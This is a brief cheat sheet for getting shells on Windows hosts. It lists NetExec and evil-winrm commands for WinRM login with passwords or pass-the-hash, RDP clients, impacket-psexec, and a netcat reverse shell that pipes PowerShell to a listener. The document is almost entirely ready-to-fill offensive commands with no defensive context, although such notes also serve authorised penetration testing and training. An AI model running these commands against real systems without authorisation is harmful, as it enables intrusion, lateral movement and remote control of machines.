🐚Shells

Evil-WinRM

Test with cme (now NetExec, nxc)

nxc winrm IP/hostname -u $USERNAME -p $PASSWORD
nxc winrm IP/hostname -u $USERNAME -H $HASH

Port: 5985

evil-winrm -i IP/hostname -u $USERNAME -H $HASH

evil-winrm -i IP/hostname -u $USERNAME -p $PASSWORD

RDP

freerdp

xfreerdp /u:$user /p:$password /v:$ip

remmina

remmina -c rdp://$user@$ip

Impacket-psexec

PSEXEC like functionality example using RemComSvc

impacket-psexec "$user:$password@$ip"
psexec.py "$user:$password@$ip"

netcat

# Windows
# connecting side (Windows host):
nc.exe $ip $port -e powershell

# listening side:
nc -lvnp $port
